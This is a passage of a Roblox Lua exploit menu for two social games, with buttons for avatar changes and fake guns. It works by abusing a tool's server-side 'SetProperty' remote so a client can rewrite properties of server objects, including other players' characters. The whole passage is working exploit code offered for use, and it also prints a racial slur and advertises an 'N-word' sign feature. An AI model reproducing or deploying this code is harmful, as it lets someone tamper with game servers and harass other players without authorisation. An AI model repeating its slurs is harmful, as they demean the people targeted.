| 511 | DTransparent.Text = "Dance Transparent" | |
| 512 | DTransparent.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 513 | DTransparent.TextSize = 22 | |
| 514 | DTransparent.MouseButton1Down:connect(function() | |
| 515 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 516 | local Autoride = true | |
| 517 | local Animations = {Shoot = 27758613}
| |
| 518 | local Ammo = 100000000000000 | |
| 519 | local Icon, Mesh, Texture = 28141033, 10604848, 94840359 | |
| 520 | local Name, ToolTip = "Scythe", "A Fucking scythe" | |
| 521 | local template = 3397310738 | |
| 522 | -- Cloud Express | |
| 523 | -- [!]Do not edit below[!] -- | |
| 524 | local CE = {}
| |
| 525 | local Variables = {
| |
| 526 | workspace = game:GetService("Workspace"),
| |
| 527 | players = game:GetService("Players")
| |
| 528 | } | |
| 529 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 530 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 531 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 532 | end | |
| 533 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW
| |
| 534 | CE:FireEvent("Cloud",MainUserW["Head"],"Material","ForceField")
| |
| 535 | CE:FireEvent("Cloud",MainUserW["Torso"],"Color",Color3.new(0, 0, 0))
| |
| 536 | CE:FireEvent("Cloud",MainUserW["Torso"],"Material","ForceField")
| |
| 537 | CE:FireEvent("Cloud",MainUserW["Left Arm"],"Material","ForceField")
| |
| 538 | CE:FireEvent("Cloud",MainUserW["Right Arm"],"Material","ForceField")
| |
| 539 | CE:FireEvent("Cloud",MainUserW["Left Leg"],"Material","ForceField")
| |
| 540 | CE:FireEvent("Cloud",MainUserW["Right Leg"],"Material","ForceField")
| |
| 541 | CE:FireEvent("Cloud",MainUserW["Pal Hair"]["Handle"],"Material","ForceField")
| |
| 542 | CE:FireEvent("Cloud",MainUserW["Pal Hair"]["Handle"],"Color",Color3.fromRGB(255, 0, 0))
| |
| 543 | end) | |
| 544 | HTransparent.Name = "HTransparent" | |
| 545 | HTransparent.Parent = Page1Frame | |
| 546 | HTransparent.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 547 | HTransparent.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 548 | HTransparent.Position = UDim2.new(0.574427485, 0, 0.0470085479, 0) | |
| 549 | HTransparent.Size = UDim2.new(0, 200, 0, 50) | |
| 550 | HTransparent.Font = Enum.Font.SourceSans | |
| 551 | HTransparent.Text = "Hangout Transparent" | |
| 552 | HTransparent.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 553 | HTransparent.TextSize = 22 | |
| 554 | HTransparent.MouseButton1Down:connect(function() | |
| 555 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 556 | local Autoride = true | |
| 557 | local Animations = {Shoot = 27758613}
| |
| 558 | local Ammo = 100000000000000 | |
| 559 | local Icon, Mesh, Texture = 28141033, 10604848, 94840359 | |
| 560 | local Name, ToolTip = "Scythe", "A Fucking scythe" | |
| 561 | local template = 3397310738 | |
| 562 | -- Cloud Express | |
| 563 | -- [!]Do not edit below[!] -- | |
| 564 | local CE = {}
| |
| 565 | local Variables = {
| |
| 566 | workspace = game:GetService("Workspace"),
| |
| 567 | players = game:GetService("Players")
| |
| 568 | } | |
| 569 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 570 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 571 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 572 | end | |
| 573 | Variables.workspace.Buy:FireServer(0, "PompousTheCloud") | |
| 574 | MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
| |
| 575 | CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material","ForceField")
| |
| 576 | CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Color",Color3.new(0, 0, 0))
| |
| 577 | CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material","ForceField")
| |
| 578 | CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material","ForceField")
| |
| 579 | CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material","ForceField")
| |
| 580 | CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material","ForceField")
| |
| 581 | CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material","ForceField")
| |
| 582 | CE:FireEvent("PompousTheCloud",MainUserW["Pal Hair"]["Handle"],"Material","ForceField")
| |
| 583 | CE:FireEvent("PompousTheCloud",MainUserW["Pal Hair"]["Handle"],"Color",Color3.fromRGB(255, 0, 0))
| |
| 584 | end) | |
| 585 | HMafia.Name = "HMafia" | |
| 586 | HMafia.Parent = Page1Frame | |
| 587 | HMafia.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 588 | HMafia.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 589 | HMafia.Position = UDim2.new(0.040076334, 0, 0.405982912, 0) | |
| 590 | HMafia.Size = UDim2.new(0, 200, 0, 50) | |
| 591 | HMafia.Font = Enum.Font.SourceSans | |
| 592 | HMafia.Text = "Hangout Mafia" | |
| 593 | HMafia.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 594 | HMafia.TextSize = 22 | |
| 595 | HMafia.MouseButton1Down:connect(function() | |
| 596 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 597 | local Autoride = true local | |
| 598 | Ammo = 100000000000000 local | |
| 599 | Name, ToolTip = "Luger", "A Fucking scythe" | |
| 600 | local CE = {} local Variables = {
| |
| 601 | workspace = game:GetService("Workspace"),
| |
| 602 | players = game:GetService("Players")
| |
| 603 | } | |
| 604 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 605 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 606 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 607 | end | |
| 608 | Variables.workspace.Buy:FireServer(0, "PompousTheCloud") | |
| 609 | MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
| |
| 610 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"], "MeshId", "rbxassetid://")
| |
| 611 | CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"], "Transparency", 0)
| |
| 612 | CE:FireEvent("PompousTheCloud",MainUserW["Shirt"], "ShirtTemplate", "rbxassetid://76408711")
| |
| 613 | CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"], "Texture", "rbxassetid://876071795")
| |
| 614 | CE:FireEvent("PompousTheCloud",MainUserW["Pants"], "PantsTemplate", "rbxassetid://76408697")
| |
| 615 | CE:FireEvent("PompousTheCloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "MeshId", "rbxassetid://13640868")
| |
| 616 | CE:FireEvent("PompousTheCloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "TextureId", "rbxassetid://13640869")
| |
| 617 | CE:FireEvent("PompousTheCloud",MainUserW["Robloxclassicred"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, -0.2, 0))
| |
| 618 | CE:FireEvent("PompousTheCloud",MainUserW["Head"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 619 | CE:FireEvent("PompousTheCloud",MainUserW["Torso"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 620 | CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 621 | CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 622 | CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 623 | CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 624 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://2337266275")
| |
| 625 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://2337266300")
| |
| 626 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"],"Scale",Vector3.new(0.9,0.9,0.9))
| |
| 627 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(0, -200, 0))
| |
| 628 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["Handle"]["Mesh"],"Position",Vector3.new(0, 0, 0))
| |
| 629 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"GripRight",Vector3.new(-5, 0, 0))
| |
| 630 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"GripPos",Vector3.new(0, 0, -0.4))
| |
| 631 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"ToolTip",ToolTip)
| |
| 632 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"]["LocalScript"],"Disabled",true)
| |
| 633 | CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"Name",Name)
| |
| 634 | wait() | |
| 635 | local Luger = MainUserW["Luger"] | |
| 636 | function ReloadLuger() | |
| 637 | local Animation = Instance.new("Animation")
| |
| 638 | -- RELOAD | |
| 639 | Animation.AnimationId = "rbxassetid://95384819" | |
| 640 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 641 | AnimationLoader:Play() | |
| 642 | AnimationLoader:AdjustSpeed(1) | |
| 643 | Ammo = Ammo + 10 | |
| 644 | end | |
| 645 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 646 | if MainUserW:FindFirstChild("Luger")
| |
| 647 | then if Ammo >= 0 then | |
| 648 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 649 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(-5, 0, 0))
| |
| 650 | local Animation = Instance.new("Animation")
| |
| 651 | wait(0.1) | |
| 652 | -- SHOOT | |
| 653 | Animation.AnimationId = "rbxassetid://95383980" | |
| 654 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 655 | AnimationLoader:Play() | |
| 656 | AnimationLoader:AdjustSpeed(1) | |
| 657 | wait() | |
| 658 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Mafia")
| |
| 659 | wait(0.5) CE:FireEvent("Luger",MainUserW["Mafia"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 660 | Ammo = Ammo - 1 | |
| 661 | CE:FireEvent("Luger",MainUserW["PompousTheCloud"]["Handle"]["Wind"],"SoundId","rbxassetid://2199374985")
| |
| 662 | CE:FireEvent("Luger",MainUserW["PompousTheCloud"],"GripRight",Vector3.new(0, 0, 0))
| |
| 663 | CE:FireEvent("Luger",MainUserW["PompousTheCloud"],"GripPos",Vector3.new(0, 0, 0))
| |
| 664 | end | |
| 665 | elseif Ammo == 0 or Ammo <= 0 then | |
| 666 | ReloadLuger() | |
| 667 | end | |
| 668 | end | |
| 669 | end) | |
| 670 | end) | |
| 671 | DMafia.Name = "DMafia" | |
| 672 | DMafia.Parent = Page1Frame | |
| 673 | DMafia.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 674 | DMafia.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 675 | DMafia.Position = UDim2.new(0.574427485, 0, 0.405982912, 0) | |
| 676 | DMafia.Size = UDim2.new(0, 200, 0, 50) | |
| 677 | DMafia.Font = Enum.Font.SourceSans | |
| 678 | DMafia.Text = "Dance Mafia" | |
| 679 | DMafia.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 680 | DMafia.TextSize = 22 | |
| 681 | DMafia.MouseButton1Down:connect(function() | |
| 682 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 683 | local Autoride = true | |
| 684 | local Ammo = 100000000000000 | |
| 685 | local Name, ToolTip = "Luger", "A Fucking scythe" | |
| 686 | local CE = {} local Variables = {
| |
| 687 | workspace = game:GetService("Workspace"),
| |
| 688 | players = game:GetService("Players")
| |
| 689 | } | |
| 690 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 691 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 692 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 693 | end | |
| 694 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"], "MeshId", "rbxassetid://")
| |
| 695 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Transparency", 0)
| |
| 696 | CE:FireEvent("Cloud",MainUserW["Shirt"], "ShirtTemplate", "rbxassetid://76408711")
| |
| 697 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Texture", "rbxassetid://876071795")
| |
| 698 | CE:FireEvent("Cloud",MainUserW["Pants"], "PantsTemplate", "rbxassetid://76408697")
| |
| 699 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "MeshId", "rbxassetid://13640868")
| |
| 700 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "TextureId", "rbxassetid://13640869")
| |
| 701 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, -0.2, 0))
| |
| 702 | CE:FireEvent("Cloud",MainUserW["Head"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 703 | CE:FireEvent("Cloud",MainUserW["Torso"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 704 | CE:FireEvent("Cloud",MainUserW["Left Arm"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 705 | CE:FireEvent("Cloud",MainUserW["Right Arm"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 706 | CE:FireEvent("Cloud",MainUserW["Left Leg"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 707 | CE:FireEvent("Cloud",MainUserW["Right Leg"], "Color", Color3.fromRGB(255, 255, 255))
| |
| 708 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://2337266275")
| |
| 709 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://2337266300")
| |
| 710 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(0.9,0.9,0.9))
| |
| 711 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(0, -200, 0))
| |
| 712 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(0, 0, 0))
| |
| 713 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(-5, 0, 0))
| |
| 714 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0, 0, -0.4))
| |
| 715 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 716 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 717 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 718 | wait() | |
| 719 | local Luger = MainUserW["Luger"] | |
| 720 | function ReloadLuger() | |
| 721 | local Animation = Instance.new("Animation")
| |
| 722 | -- RELOAD | |
| 723 | Animation.AnimationId = "rbxassetid://95384819" | |
| 724 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 725 | AnimationLoader:Play() | |
| 726 | AnimationLoader:AdjustSpeed(1) | |
| 727 | Ammo = Ammo + 10 | |
| 728 | end | |
| 729 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 730 | if MainUserW:FindFirstChild("Luger") then
| |
| 731 | if Ammo >= 0 then | |
| 732 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 733 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(-5, 0, 0))
| |
| 734 | local Animation = Instance.new("Animation")
| |
| 735 | wait(0.1) | |
| 736 | -- SHOOT | |
| 737 | Animation.AnimationId = "rbxassetid://95383980" | |
| 738 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 739 | AnimationLoader:Play() | |
| 740 | AnimationLoader:AdjustSpeed(1) | |
| 741 | wait() | |
| 742 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Mafia")
| |
| 743 | wait(0.5) | |
| 744 | CE:FireEvent("Luger",MainUserW["Mafia"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 745 | Ammo = Ammo - 1 | |
| 746 | CE:FireEvent("Luger",MainUserW["Cloud"]["Handle"]["Wind"],"SoundId","rbxassetid://2199374985")
| |
| 747 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripRight",Vector3.new(0, 0, 0))
| |
| 748 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripPos",Vector3.new(0, 0, 0))
| |
| 749 | end | |
| 750 | elseif Ammo == 0 or Ammo <= 0 then | |
| 751 | ReloadLuger() | |
| 752 | end | |
| 753 | end | |
| 754 | end) | |
| 755 | end) | |
| 756 | ShowCmds.Name = "ShowCmds" | |
| 757 | ShowCmds.Parent = Page1Frame | |
| 758 | ShowCmds.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 759 | ShowCmds.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 760 | ShowCmds.Position = UDim2.new(0.040076334, 0, 0.743589818, 0) | |
| 761 | ShowCmds.Size = UDim2.new(0, 200, 0, 50) | |
| 762 | ShowCmds.Font = Enum.Font.SourceSans | |
| 763 | ShowCmds.Text = "Show Cmds (Press F9 to view)" | |
| 764 | ShowCmds.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 765 | ShowCmds.TextSize = 18 | |
| 766 | ShowCmds.MouseButton1Down:connect(function() | |
| 767 | print ('MADE BY DUMB ASS NIGGA')
| |
| 768 | print('Hangout Transparent -Transparent in Boys and girls Hangout')
| |
| 769 | print('Dance Transparent -Transparent in Boys and girls DanceClub')
| |
| 770 | print('Hangout Mafia -Mafia outfit with gun For Boys and girls Hangout')
| |
| 771 | print('Dance Mafia -Mafia outfit with gun on DanceClub')
| |
| 772 | print('Dance Hell Sword -Hellsword on DanceClub')
| |
| 773 | print('Dance Staff -Staff on DanceClub')
| |
| 774 | print('NWord Sign -The n word pass')
| |
| 775 | print('Semi Shooter -Really cool gun on DanceClub')
| |
| 776 | print('Dance Demon -Demon outfit I made on DanceClub')
| |
| 777 | print('E-Girl -Basically your average white girl minus the starbucks lol')
| |
| 778 | print('Mute Radios -Mutes current audios playing')
| |
| 779 | print('Loud Boombox -Play an audio first, then click the button')
| |
| 780 | end) | |
| 781 | MadeBy.Name = "MadeBy" | |
| 782 | MadeBy.Parent = Page1Frame | |
| 783 | MadeBy.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 784 | MadeBy.BackgroundTransparency = 1 | |
| 785 | MadeBy.Position = UDim2.new(-1.21071935e-08, 0, -0.0854702592, 0) | |
| 786 | MadeBy.Size = UDim2.new(0, 200, 0, 11) | |
| 787 | MadeBy.Font = Enum.Font.SourceSans | |
| 788 | MadeBy.Text = "fuck" | |
| 789 | MadeBy.TextColor3 = Color3.new(1, 1, 1) | |
| 790 | MadeBy.TextSize = 14 | |
| 791 | ComingSoon.Name = "Coming Soon..." | |
| 792 | ComingSoon.Parent = Page1Frame | |
| 793 | ComingSoon.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 794 | ComingSoon.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 795 | ComingSoon.Position = UDim2.new(0.570614278, 0, 0.743589699, 0) | |
| 796 | ComingSoon.Size = UDim2.new(0, 200, 0, 50) | |
| 797 | ComingSoon.Font = Enum.Font.SourceSans | |
| 798 | ComingSoon.Text = "Coming Soon..." | |
| 799 | ComingSoon.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 800 | ComingSoon.TextSize = 22 | |
| 801 | Page2Frame.Name = "Page2Frame" | |
| 802 | Page2Frame.Parent = HomeFrame | |
| 803 | Page2Frame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 804 | Page2Frame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 805 | Page2Frame.Position = UDim2.new(-0, 0, 0.112999998, 0) | |
| 806 | Page2Frame.Size = UDim2.new(0, 525, 0, 234) | |
| 807 | Page2Frame.Visible = false | |
| 808 | DHellSword.Name = "DHellSword" | |
| 809 | DHellSword.Parent = Page2Frame | |
| 810 | DHellSword.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 811 | DHellSword.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 812 | DHellSword.Position = UDim2.new(0.040076334, 0, 0.0470085479, 0) | |
| 813 | DHellSword.Size = UDim2.new(0, 200, 0, 50) | |
| 814 | DHellSword.Font = Enum.Font.SourceSans | |
| 815 | DHellSword.Text = "Dance Hell Sword" | |
| 816 | DHellSword.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 817 | DHellSword.TextSize = 22 | |
| 818 | DHellSword.MouseButton1Down:connect(function() | |
| 819 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 820 | local Autoride = true | |
| 821 | local Animations = {
| |
| 822 | Shoot = 95383980, | |
| 823 | Reload = 95384819 | |
| 824 | } | |
| 825 | local Ammo = 1000 | |
| 826 | local Icon, Mesh, Texture = 95356596, 94840342, 94840359 | |
| 827 | local Name, ToolTip = "Luger", "A Fucking gun" | |
| 828 | -- Cloud Express | |
| 829 | -- [!]Do not edit below[!] -- | |
| 830 | local CE = {}
| |
| 831 | local Variables = {
| |
| 832 | workspace = game:GetService("Workspace"),
| |
| 833 | players = game:GetService("Players")
| |
| 834 | } | |
| 835 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 836 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 837 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 838 | end | |
| 839 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW CE:FireEvent("Cloud",MainUserW["Cloud"],"TextureId","rbxassetid://"..Icon)
| |
| 840 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://"..Mesh)
| |
| 841 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://"..Texture)
| |
| 842 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(1,1,1))
| |
| 843 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(-0.23,12.94,1.05))
| |
| 844 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(-111.387,3.568,-35.084))
| |
| 845 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripForward",Vector3.new(-0.545, -0.089, -0.834))
| |
| 846 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0.094, -2.656, 0.156))
| |
| 847 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 848 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripUp",Vector3.new(-0.027, 0.996, -0.089))
| |
| 849 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 850 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 851 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 852 | wait() | |
| 853 | local Luger = MainUserW["Luger"] | |
| 854 | function ReloadLuger() | |
| 855 | Animation = Instance.new("Animation")
| |
| 856 | -- RELOAD | |
| 857 | Animation.AnimationId = "rbxassetid://77329203" | |
| 858 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 859 | AnimationLoader:Play() | |
| 860 | AnimationLoader:AdjustSpeed(1) | |
| 861 | Ammo = Ammo + 10 | |
| 862 | end | |
| 863 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 864 | if MainUserW:FindFirstChild("Luger") then
| |
| 865 | if Ammo >= 0 then | |
| 866 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 867 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(0.838, -0.026, -0.545))
| |
| 868 | local Animation = Instance.new("Animation")
| |
| 869 | -- SHOOT | |
| 870 | Animation.AnimationId = "rbxassetid://184574340" | |
| 871 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 872 | AnimationLoader:Play() | |
| 873 | AnimationLoader:AdjustSpeed(1) | |
| 874 | wait() | |
| 875 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "yeet")
| |
| 876 | wait(0.5) CE:FireEvent("Luger",MainUserW["yeet"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 877 | Ammo = Ammo - 1 | |
| 878 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 879 | end | |
| 880 | elseif Ammo == 0 or Ammo <= 0 then | |
| 881 | ReloadLuger() | |
| 882 | end | |
| 883 | end | |
| 884 | end) | |
| 885 | end) | |
| 886 | SemiShooter.Name = "SemiShooter" | |
| 887 | SemiShooter.Parent = Page2Frame | |
| 888 | SemiShooter.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 889 | SemiShooter.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 890 | SemiShooter.Position = UDim2.new(0.574427485, 0, 0.0470085479, 0) | |
| 891 | SemiShooter.Size = UDim2.new(0, 200, 0, 50) | |
| 892 | SemiShooter.Font = Enum.Font.SourceSans | |
| 893 | SemiShooter.Text = "SemiShooter" | |
| 894 | SemiShooter.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 895 | SemiShooter.TextSize = 22 | |
| 896 | SemiShooter.MouseButton1Down:connect(function() | |
| 897 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 898 | local Autoride = true local Animations = {
| |
| 899 | Shoot = 95383980, | |
| 900 | Reload = 95384819 | |
| 901 | } | |
| 902 | local Ammo = 1000 | |
| 903 | local Icon, Mesh, Texture = 95356596, 542170666, 542171009 | |
| 904 | local Name, ToolTip = "Luger", "Fire In The Hole!!" | |
| 905 | -- Cloud Express | |
| 906 | -- [!]Do not edit below[!] -- | |
| 907 | local CE = {}
| |
| 908 | local Variables = {
| |
| 909 | workspace = game:GetService("Workspace"),
| |
| 910 | players = game:GetService("Players")
| |
| 911 | } local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 912 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 913 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 914 | end | |
| 915 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW
| |
| 916 | CE:FireEvent("Cloud",MainUserW["Cloud"],"TextureId","rbxassetid://"..Icon)
| |
| 917 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://"..Mesh)
| |
| 918 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://"..Texture)
| |
| 919 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(0.4,0.4,0.4))
| |
| 920 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(-0.23,12.94,1.05))
| |
| 921 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(-111.387,3.568,-35.084))
| |
| 922 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripForward",Vector3.new(-0.545, -0.089, -0.834))
| |
| 923 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0.294, -0.906, 1.46))
| |
| 924 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 925 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripUp",Vector3.new(-0.027, 0.996, -0.089))
| |
| 926 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
